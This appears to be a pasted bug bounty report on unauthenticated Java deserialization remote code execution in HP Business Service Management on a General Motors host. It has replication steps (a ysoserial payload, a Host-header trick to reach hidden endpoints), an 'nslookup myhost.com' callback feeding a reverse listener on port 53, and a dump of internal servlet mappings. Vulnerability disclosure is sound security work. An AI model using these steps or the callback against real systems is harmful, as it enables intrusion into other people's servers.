API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 20th, 2017
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 84.41 KB | None | 0 0
raw download clone embed print report
  1. cayce (cayce) 100 -
  2. Reputation Rank
  3. #212459 Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.
  4.  
  5. State Informative (Closed)
  6.  
  7. Reported To General Motors
  8.  
  9. Scope
  10.  
  11. Weakness Code Injection
  12.  
  13. Severity Critical (9 ~ 10)
  14.  
  15. Participants cayce cubo hackerone-support
  16.  
  17. Visibility Private
  18.  
  19. Collapse
  20.  
  21. Summary by cayce: Tilting at Windmills
  22. Edit/Delete
  23.  
  24. Title: Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.
  25. Weakness: Code Injection
  26. Severity: Critical
  27. Link: https://hackerone.com/reports/212459
  28. Date: 2017-03-11 03:23:47 +0000
  29. By: @cayce
  30.  
  31. Details:
  32. Type:
  33. Java deserialization RCE
  34.  
  35. Availability:
  36. HP Business Service Management
  37. /tvb/remoteProxy Servlet suffers from serialization injection attack.
  38. /bpi/remoteProxy Servlet suffers from serialization injection attack.
  39.  
  40. Exploitability:
  41. Remotely exploitable by any user.
  42.  
  43. Impact:
  44. Successful exploitation provides attacker the ability to perform remote code execution (RCE).
  45. With this RCE, attacker is able to deliver shell to the host and proceed to full root
  46. escalation (depending upon system hardening) and compromise of all logged (network,
  47. server, application and business) transaction monitored.
  48. Like WHOA!
  49.  
  50. Steps to repeat:
  51. Replication:
  52. 1) Build groovy serialization payload with something like this:
  53. https://github.com/frohoff/ysoserial
  54.  
  55. 2) Use payload in proxy/script/debugger to submit to server (These endpoint's are not initially publicly available but, a quick change to the "Host" header solved that. I guess there is a broken FW/WAF/IAM solution in the mix as well?
  56.  
  57. 3) Harvest
  58.  
  59. PoCs:
  60. (See attachment)
  61.  
  62. Roots Causes:
  63. 1) This host CLEARY was deployed without reading the "Hardening Guide" from the vendor.
  64. The entire suite (it's BIG) deployed on the same node, o'Rly?
  65.  
  66. 2) There must be issues with the change management process or the firewall technology used.
  67. There is no reason for this sadly deployed node to be publicly accessable.
  68.  
  69. 3) Previously mentioned unnecessarily installed "Feature" receives unvalidated input from
  70. untrusted users.
  71. By sending a payload such as 'nslookup myhost.com', target will make the request to
  72. myhost.com. myhost.com can provide download/reverse listener via port 53. Escalation
  73. and elevation on going.
  74.  
  75. Additional information:
  76. https://www.sans.org/security-resources/mistakes
  77. The Seven Worst Security Mistakes Senior Executives Make
  78.  
  79. ****1: Assigning untrained people to maintain security and providing neither the training nor the time to make it possible to learn and do the job.****
  80. This is failure of 101s from the top down. I say this due to the choice to put all
  81. the orgs eggs in one "vendor centric" basket which, it's self has a gaping hole.
  82. Or ought I say, without a bottom because, that's a better picture of the service
  83. provided by the vendor/basket. Eggs go it for security yet, entire business profile
  84. becomes exposed for profit. One might ask for whom.
  85. ****2: Failing to understand the relationship of information security to the business problem-they understand physical security but do not see the consequences of poor information security.****
  86. Somebody spent AND made a LOT of money with all these top tier "Enterprise Grade"
  87. products yet, 101 security principles agreed upon for over two decades are ignored
  88. without consequence .
  89. ?3: Failing to deal with the operational aspects of security: making a few fixes and then not allowing the follow through necessary to ensure the problems stay fixed?
  90. We'll see this node will likely simply be firewalled, rebuilt or pulled offline but,
  91. there won't be sufficient policy change to prevent this in the future. Another
  92. "Enterprise Grade"/ISACA "Certified" product will be rolled out again in the near future,
  93. unhardened, without consequence.
  94. ****4: Relying primarily on a firewall.****
  95. Port 53, wowwie; your perimeter team just doesn't get it ... at all.
  96. ****5: Failing to realize how much money their information and organizational reputations are worth.****
  97. See response to mistake #2. THAT much money was spent to secure, must be valuable assets.
  98. ****6: Authorizing reactive, short-term fixes so problems re-emerge rapidly.****
  99. This is a must-have "Big Data" solution. Bad news, they don't EVER work when deployed
  100. without the guidance of an experienced (as in YEARS, OSes, PROTOCOLS, ENVIRONMENTS, BADNESS)
  101. system architect. I'm certain that was a line item from the vendor of this product. Did
  102. this org rely on internal expertise or maybe found another contractor to be able to pin
  103. the blame on?
  104. ****7: Pretending the problem will go away if they ignore it.****
  105. Nobody will get axed, just less of an unwarranted bonus. All of the charlatans
  106. that bought/sold/allowed/profited/created this mess will continue to do so.
  107.  
  108. The Ten Worst Security Mistakes Information Technology People Make
  109.  
  110. ****1: Connecting systems to the Internet before hardening them.****
  111. There's an "Administration Manual" as well as a "Hardening Guide" available from the vendor,
  112. someone ought read them. Not reference them, really just read them.
  113. ?2: Connecting test systems to the Internet with default accounts/passwords?
  114. TBD3: Failing to update systems when security holes are found.TBD
  115. ?4: Using telnet and other unencrypted protocols for managing systems, routers, firewalls, and PKI.?
  116. ?5: Giving users passwords over the phone or changing user passwords in response to telephone or personal requests when the requester is not authenticated.
  117. ?6: Failing to maintain and test backups.
  118. ****7: Running unnecessary services, especially ftpd, telnetd, finger, rpc, mail, rservices****
  119. Looks as though someone BLINDLY installed each and every downloadable installer available
  120. from the vendor download page. Are they truly ALL in use? Doubt it.
  121. ****8: Implementing firewalls with rules that don't stop malicious or dangerous traffic-incoming or outgoing.****
  122. ?9: Failing to implement or update virus detection software?
  123. ****10: Failing to educate users on what to look for and what to do when they see a potential security problem.?****
  124. I was not "shy" during my testing. There ought have been countless opportunities for
  125. the SOC team to identify and protect affected assets. They are certainly using the
  126. same vendor's product(s).
  127.  
  128. ****And a bonus, number 11: Allowing untrained, uncertified people to take responsibility for securing important systems.****
  129. How many members of the Security team are contractors and how many are internal employees?
  130. What's the total years of modern, hand-on experience?
  131.  
  132. There are countless writeups and CVEs to support in understanding this class of vulnerability.
  133. Here is one:
  134. https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  135.  
  136.  
  137. Steps toward remediation:
  138. a) Unplug this host. Acquire patches from vendor. Review "Hardening Guide". Rebuild
  139. from scratch and restore data backups as necessary. Review "Hardening Guide" again.
  140. Perform internal testing and monitoring. Reconsider purchase?
  141.  
  142. b) All change control and perimeter policies ought be reviewed to be hardened to prevent
  143. access to internal nodes from untrusted external sources.
  144.  
  145. c) Maintain an internal threat feed that includes vulnerability discoveries. Insure
  146. analysts read AND understand them. This is a two year old apocalypse attack. This is
  147. unsettling to say the least that.
  148.  
  149. c) At the application layer, don't expose unnecessary services. If there is a business
  150. use case for them to be available, perform input validation on all exposed end-points.
  151.  
  152. d) Stop buying security products you don't understand from vendors you can't trust
  153. and start spending money on what works, people and process.
  154.  
  155. X) Get rid of the VERY expensive cookie cutter "Professional Services" consultants
  156. and hire some hackers, maybe even BUILD a team?
  157.  
  158.  
  159.  
  160.  
  161. Timeline:
  162. 2017-03-11 03:25:39 +0000: @cayce (comment)
  163. Host: vulnerable.host.gm.com
  164. HP Business Service Management (BSM) on production (prdm) segment.
  165.  
  166. ---
  167.  
  168. 2017-03-11 03:50:51 +0000: @cubo (bug triaged)
  169. Thank you for you submission. We are investigating your report with the GM security team. We value your submission and will respond shortly with our findings.
  170.  
  171. ---
  172.  
  173. 2017-03-11 05:06:45 +0000: @cayce (comment)
  174. For additional unauthenticated file/service enumeration, the endpoint "/jkstatus" is also exposed.
  175.  
  176. ---
  177.  
  178. 2017-03-11 05:24:30 +0000: @cayce (comment)
  179. JK Status Manager for vulnerable.host.gm.com:443
  180.  
  181. Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 00:22:49 Eastern Standard Time
  182. JK Version: mod_jk/1.2.40 Unix Seconds: 1489209769
  183. Start auto refresh (every
  184. 10
  185. seconds)
  186. |
  187. Change format
  188. [Read Only] [Dump] [S=Show only this worker, E=Edit worker, R=Reset worker state, T=Try worker recovery]
  189. Listing AJP Workers (4 Workers) [Hide]
  190.  
  191. [S|E|R] Worker Status for localAjp
  192.  
  193. Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
  194. ajp13 127.0.0.1 127.0.0.1:8009 0 0 0 0 2 0
  195.  
  196. State Acc Err CE RE Wr Rd Busy Max Con LR LE
  197. OK 452336 (1/sec) 0 1040 0 117T (484M/sec) 769T (3.1G/sec) 1 19 28 254462 Sat, 18 Feb 2017 11:51:48 Eastern Standard Time
  198. URI Mappings for localAjp (378 maps) [Hide]
  199.  
  200. Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
  201. internalsubsomain.was.here.gm.com:80 /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
  202. internalsubsomain.was.here.gm.com:80 /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
  203. internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
  204. internalsubsomain.was.here.gm.com:80 /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  205. internalsubsomain.was.here.gm.com:80 /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  206. internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
  207. internalsubsomain.was.here.gm.com:80 /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  208. internalsubsomain.was.here.gm.com:80 /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  209. internalsubsomain.was.here.gm.com:80 /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
  210. internalsubsomain.was.here.gm.com:80 /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
  211. internalsubsomain.was.here.gm.com:80 /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  212. internalsubsomain.was.here.gm.com:80 /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  213. internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
  214. internalsubsomain.was.here.gm.com:80 /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  215. internalsubsomain.was.here.gm.com:80 /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
  216. internalsubsomain.was.here.gm.com:80 /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
  217. internalsubsomain.was.here.gm.com:80 /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
  218. internalsubsomain.was.here.gm.com:80 /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  219. internalsubsomain.was.here.gm.com:80 /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
  220. internalsubsomain.was.here.gm.com:80 /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
  221. internalsubsomain.was.here.gm.com:80 /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
  222. internalsubsomain.was.here.gm.com:80 /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
  223. internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
  224. internalsubsomain.was.here.gm.com:80 /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  225. internalsubsomain.was.here.gm.com:80 /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  226. internalsubsomain.was.here.gm.com:80 /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  227. internalsubsomain.was.here.gm.com:80 /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  228. internalsubsomain.was.here.gm.com:80 /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
  229. internalsubsomain.was.here.gm.com:80 /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  230. internalsubsomain.was.here.gm.com:80 /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
  231. internalsubsomain.was.here.gm.com:80 /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  232. internalsubsomain.was.here.gm.com:80 /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
  233. internalsubsomain.was.here.gm.com:80 /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
  234. internalsubsomain.was.here.gm.com:80 /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
  235. internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  236. internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
  237. internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
  238. internalsubsomain.was.here.gm.com:80 /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
  239. internalsubsomain.was.here.gm.com:80 /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
  240. internalsubsomain.was.here.gm.com:80 /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
  241. internalsubsomain.was.here.gm.com:80 /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
  242. internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
  243. internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
  244. internalsubsomain.was.here.gm.com:80 /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
  245. internalsubsomain.was.here.gm.com:80 /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
  246. internalsubsomain.was.here.gm.com:80 /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  247. internalsubsomain.was.here.gm.com:80 /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
  248. internalsubsomain.was.here.gm.com:80 /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
  249. internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
  250. internalsubsomain.was.here.gm.com:80 /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  251. internalsubsomain.was.here.gm.com:80 /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
  252. internalsubsomain.was.here.gm.com:80 /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  253. internalsubsomain.was.here.gm.com:80 /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
  254. internalsubsomain.was.here.gm.com:80 /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
  255. internalsubsomain.was.here.gm.com:80 /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
  256. internalsubsomain.was.here.gm.com:80 /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
  257. internalsubsomain.was.here.gm.com:80 /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
  258. internalsubsomain.was.here.gm.com:80 /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
  259. internalsubsomain.was.here.gm.com:80 /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
  260. internalsubsomain.was.here.gm.com:80 /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  261. internalsubsomain.was.here.gm.com:80 /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
  262. internalsubsomain.was.here.gm.com:80 /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
  263. internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
  264. internalsubsomain.was.here.gm.com:80 /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  265. internalsubsomain.was.here.gm.com:80 /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
  266. internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  267. internalsubsomain.was.here.gm.com:80 /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
  268. internalsubsomain.was.here.gm.com:80 /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
  269. internalsubsomain.was.here.gm.com:80 /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  270. internalsubsomain.was.here.gm.com:80 /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
  271. internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
  272. internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
  273. internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
  274. internalsubsomain.was.here.gm.com:80 /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
  275. internalsubsomain.was.here.gm.com:80 /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
  276. internalsubsomain.was.here.gm.com:80 /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
  277. internalsubsomain.was.here.gm.com:80 /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
  278. internalsubsomain.was.here.gm.com:80 /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
  279. internalsubsomain.was.here.gm.com:80 /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
  280. internalsubsomain.was.here.gm.com:80 /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
  281. internalsubsomain.was.here.gm.com:80 /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
  282. internalsubsomain.was.here.gm.com:80 /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
  283. internalsubsomain.was.here.gm.com:80 /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
  284. internalsubsomain.was.here.gm.com:80 /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
  285. internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
  286. internalsubsomain.was.here.gm.com:80 /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
  287. internalsubsomain.was.here.gm.com:80 /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
  288. internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
  289. internalsubsomain.was.here.gm.com:80 /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
  290. internalsubsomain.was.here.gm.com:80 /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
  291. internalsubsomain.was.here.gm.com:80 /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  292. internalsubsomain.was.here.gm.com:80 /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
  293. internalsubsomain.was.here.gm.com:80 /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
  294. internalsubsomain.was.here.gm.com:80 /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  295. internalsubsomain.was.here.gm.com:80 /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
  296. internalsubsomain.was.here.gm.com:80 /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
  297. internalsubsomain.was.here.gm.com:80 /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  298. internalsubsomain.was.here.gm.com:80 /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
  299. internalsubsomain.was.here.gm.com:80 /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
  300. internalsubsomain.was.here.gm.com:80 /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
  301. internalsubsomain.was.here.gm.com:80 /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  302. internalsubsomain.was.here.gm.com:80 /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  303. internalsubsomain.was.here.gm.com:80 /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  304. internalsubsomain.was.here.gm.com:80 /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
  305. internalsubsomain.was.here.gm.com:80 /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
  306. internalsubsomain.was.here.gm.com:80 /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
  307. internalsubsomain.was.here.gm.com:80 /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
  308. internalsubsomain.was.here.gm.com:80 /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  309. internalsubsomain.was.here.gm.com:80 /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  310. internalsubsomain.was.here.gm.com:80 /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  311. internalsubsomain.was.here.gm.com:80 /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
  312. internalsubsomain.was.here.gm.com:80 /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
  313. internalsubsomain.was.here.gm.com:80 /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  314. internalsubsomain.was.here.gm.com:80 /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
  315. internalsubsomain.was.here.gm.com:80 /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  316. internalsubsomain.was.here.gm.com:80 /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
  317. internalsubsomain.was.here.gm.com:80 /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  318. internalsubsomain.was.here.gm.com:80 /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  319. internalsubsomain.was.here.gm.com:80 /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
  320. internalsubsomain.was.here.gm.com:80 /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
  321. internalsubsomain.was.here.gm.com:80 /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
  322. internalsubsomain.was.here.gm.com:80 /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  323. internalsubsomain.was.here.gm.com:80 /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  324. internalsubsomain.was.here.gm.com:80 /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
  325. internalsubsomain.was.here.gm.com:80 /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
  326. internalsubsomain.was.here.gm.com:80 /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
  327. internalsubsomain.was.here.gm.com:80 /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
  328. internalsubsomain.was.here.gm.com:80 /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
  329. internalsubsomain.was.here.gm.com:80 /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  330. internalsubsomain.was.here.gm.com:80 /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
  331. internalsubsomain.was.here.gm.com:80 /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  332. internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
  333. internalsubsomain.was.here.gm.com:80 /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
  334. internalsubsomain.was.here.gm.com:80 /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
  335. internalsubsomain.was.here.gm.com:80 /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
  336. internalsubsomain.was.here.gm.com:80 /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
  337. internalsubsomain.was.here.gm.com:80 /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  338. internalsubsomain.was.here.gm.com:80 /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
  339. internalsubsomain.was.here.gm.com:80 /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  340. internalsubsomain.was.here.gm.com:80 /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
  341. internalsubsomain.was.here.gm.com:80 /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  342. internalsubsomain.was.here.gm.com:80 /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
  343. internalsubsomain.was.here.gm.com:80 /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
  344. internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
  345. internalsubsomain.was.here.gm.com:80 /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  346. internalsubsomain.was.here.gm.com:80 /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
  347. internalsubsomain.was.here.gm.com:80 /topaz/download Exact uriworkermap -1 0 0 - - - - 0
  348. internalsubsomain.was.here.gm.com:80 /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
  349. internalsubsomain.was.here.gm.com:80 /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
  350. internalsubsomain.was.here.gm.com:80 /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
  351. internalsubsomain.was.here.gm.com:80 /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
  352. internalsubsomain.was.here.gm.com:80 /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
  353. internalsubsomain.was.here.gm.com:80 /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
  354. internalsubsomain.was.here.gm.com:80 /bpi/download Exact uriworkermap -1 0 0 - - - - 0
  355. internalsubsomain.was.here.gm.com:80 /tvb/download Exact uriworkermap -1 0 0 - - - - 0
  356. internalsubsomain.was.here.gm.com:80 /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
  357. internalsubsomain.was.here.gm.com:80 /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
  358. internalsubsomain.was.here.gm.com:80 /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  359. internalsubsomain.was.here.gm.com:80 /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
  360. internalsubsomain.was.here.gm.com:80 /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
  361. internalsubsomain.was.here.gm.com:80 /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
  362. internalsubsomain.was.here.gm.com:80 /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
  363. internalsubsomain.was.here.gm.com:80 /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
  364. internalsubsomain.was.here.gm.com:80 /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
  365. internalsubsomain.was.here.gm.com:80 /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
  366. internalsubsomain.was.here.gm.com:80 /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  367. internalsubsomain.was.here.gm.com:80 /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
  368. internalsubsomain.was.here.gm.com:80 /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  369. internalsubsomain.was.here.gm.com:80 /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  370. internalsubsomain.was.here.gm.com:80 /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
  371. internalsubsomain.was.here.gm.com:80 /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
  372. internalsubsomain.was.here.gm.com:80 /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  373. internalsubsomain.was.here.gm.com:80 /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
  374. internalsubsomain.was.here.gm.com:80 /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
  375. internalsubsomain.was.here.gm.com:80 /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
  376. internalsubsomain.was.here.gm.com:80 /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
  377. internalsubsomain.was.here.gm.com:80 /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
  378. internalsubsomain.was.here.gm.com:80 /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
  379. internalsubsomain.was.here.gm.com:80 /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
  380. internalsubsomain.was.here.gm.com:80 /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
  381. internalsubsomain.was.here.gm.com:80 /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
  382. internalsubsomain.was.here.gm.com:80 /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
